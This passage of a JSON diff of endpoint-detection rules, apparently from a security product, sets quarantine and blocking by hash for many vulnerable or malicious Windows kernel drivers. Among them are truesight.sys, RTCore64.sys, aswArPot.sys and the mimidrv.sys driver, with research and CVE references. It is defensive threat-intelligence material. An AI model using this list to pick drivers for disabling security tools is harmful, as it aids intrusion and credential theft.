"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd2d3628-4315-54b0-a7e3-a280a80e3d7e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473417Z", + "creation_date": "2026-03-23T11:45:31.473420Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473430Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "213d3b79119bfd48176f99c0e15ec19b0082eaab0dc0a744ab1151e21479ffe2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd2efac5-b10e-5f16-aa61-f805c9b5962a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463356Z", + "creation_date": "2026-03-23T11:45:30.463360Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463369Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4af8192870afe18c77381dfaf8478f8914fa32906812bb53073da284a49ae4c7", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd32d148-d91b-5f7f-97ad-9757e97a5e13", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809444Z", + "creation_date": "2026-03-23T11:45:31.809447Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34330c8d41b2600513912d286a6a9c7b9839b2a34ab6b6118db18bc7e4c80718", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd3d90d8-2535-5daa-9e7e-4d0e5798139a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822411Z", + "creation_date": "2026-03-23T11:45:31.822414Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822422Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7516a0d5bf936c2c9718250219bdd5a61f92767006f744e4f8c11b1698e684fb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd4086b8-b296-59b1-b0cc-7eae15ce3836", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486138Z", + "creation_date": "2026-03-23T11:45:31.486141Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486150Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3fa1e8727a84561d848040a770106a51e69023f35bd05566e3c35229328956e9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd42167b-de94-5c33-ad28-9edb3fb48d7c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826456Z", + "creation_date": "2026-03-23T11:45:31.826458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826463Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c36c1d52bbe66ca632637c419537e3b5d1d366791a7053249649d5d6a1dc331", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd4dfa0c-bb0c-5c3f-960b-e2d864570d4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969853Z", + "creation_date": "2026-03-23T11:45:29.969855Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969860Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "596c497e7e405ceb79ba0ba45f993125d88d50fc18867048d0c7a356ebd0c0ed", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd56913e-891f-59af-8479-51a4d724c94c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983317Z", + "creation_date": "2026-03-23T11:45:29.983319Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983324Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c6f9917418e991ed41540d8d882c8ca51d582a82fd01bff6cdf26591454faf5", + "comment": "Vulnerable Kernel Driver (aka dcr.sys) [https://www.loldrivers.io/drivers/b1dd91b1-9ba3-4d68-a2d1-919039e18430/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd5c958e-4343-5885-b4bd-4e0d3326a15b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826674Z", + "creation_date": "2026-03-23T11:45:30.826676Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826681Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "903f2d45806520607ad555ba09be0a58bfda695ef8e9369b9a5488e2a62b9824", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd604202-9a23-5f54-bc1d-93b7a69e53ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828120Z", + "creation_date": "2026-03-23T11:45:30.828122Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828127Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62eb6173b66b077a3209dfbd91799d31d903459cbf42cf589070e688704d877b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd66692b-facb-5e41-8080-ceb16408cb74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615485Z", + "creation_date": "2026-03-23T11:45:29.615487Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615492Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a63937a6320f50c4782d0675104932907d16a91d89088ac979a7a0129aad986", + "comment": "MICRO-STAR vulnerable drivers (aka 
NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd74cbe1-e6c3-5148-8ecf-0f4ab516f39a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473672Z", + "creation_date": "2026-03-23T11:45:31.473676Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473685Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f6f5ce1c93097510f16357742bf393141da37f6f1a2d889c32f93c76029fca9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd76cff3-8e1b-5b8a-b744-fd14d33614e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.828148Z", + "creation_date": "2026-03-23T11:45:31.828150Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828156Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b2f24cf8c0550c2d04bf3571f7d406f84f8ebb5c80805030cca52c8a957a815", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd783263-fc82-538b-b16c-4f080e692e96", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831272Z", + "creation_date": "2026-03-23T11:45:30.831274Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831280Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "775a8740685d468911625d152917d450ea41968162aeb6fe80bf1c2e36aee862", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd809f73-ef60-5e97-8813-8880c5f82660", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460069Z", + "creation_date": "2026-03-23T11:45:30.460072Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460080Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9a2bf0f5ba185170441f003dc46fbb570e1c9fdf2132ab7de28b87ba7ad1a0c", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd8a092a-ad18-5fcd-a481-b73145a448d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819278Z", + "creation_date": "2026-03-23T11:45:30.819280Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.819285Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d45600f3015a54fa2c9baa7897edbd821aeea2532e6aadb8065415ed0a23d0c2", + "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd9662c8-25a9-5cc1-8679-8e07913bc0d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457592Z", + "creation_date": "2026-03-23T11:45:30.457596Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457605Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ecb25cb7a127729a0124d1c0e0ba7dd0c24a02f48f40f6af174b15581b6925c", + "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd977d02-b5d6-5c63-b14c-feb34aea6e49", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973042Z", + "creation_date": "2026-03-23T11:45:29.973044Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973049Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ada4e42bf5ef58ef1aad94435441003b1cc1fcaa5d38bfdbe1a3d736dc451d47", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd9c16ae-128a-5e10-bd0d-d8c200f7c48f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154007Z", + "creation_date": "2026-03-23T11:45:31.154009Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154014Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"1e6bc1f84a7867714aa8ba2a45e24b0546b869e58e1e7b33992d4f3583590d27", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd9c73b3-810d-5a6f-b8bb-74e23c057d52", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145603Z", + "creation_date": "2026-03-23T11:45:32.145605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145611Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "131e84e32dae6954247fc0699d5ba52bf2936b5a782c795ae9e708829a5c26d6", + "comment": "Vulnerable Kernel Driver (aka pxitrig64.sys) [https://www.loldrivers.io/drivers/c8619f49-8e23-489b-9878-53d27533da15/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd9e94ab-a4de-5be6-a136-0ed10abcb1e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836451Z", + "creation_date": "2026-03-23T11:45:30.836453Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836458Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17a05f99826e8b1ebf223377dbcc8a007f4f22dddfad72058f040957485df030", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fda3e07d-75e3-5587-b3a5-0e8c31bbc0e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807822Z", + "creation_date": "2026-03-23T11:45:31.807825Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807834Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "168bb136f51bc4b442eb62e78fe0fe30972a6a833c38398e1a7a470fb8c91cd8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fdb1ac33-8668-5ce9-85f0-bc01568e5e8a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612897Z", + "creation_date": "2026-03-23T11:45:29.612899Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612904Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fd388cf1df06d419b14dedbeb24c6f4dff37bea26018775f09d56b3067f0de2c", + "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fdba7b11-9db5-57ee-89bf-bc6243d26a9c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157240Z", + "creation_date": 
"2026-03-23T11:45:31.157242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157248Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c92e8c94f05926a0f324c85f809fd236ee6f99a83ccfa9c2bcd3dc4dc9e8c7b8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fdcf4eb2-3a8f-5204-9f16-1afce0834a21", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, 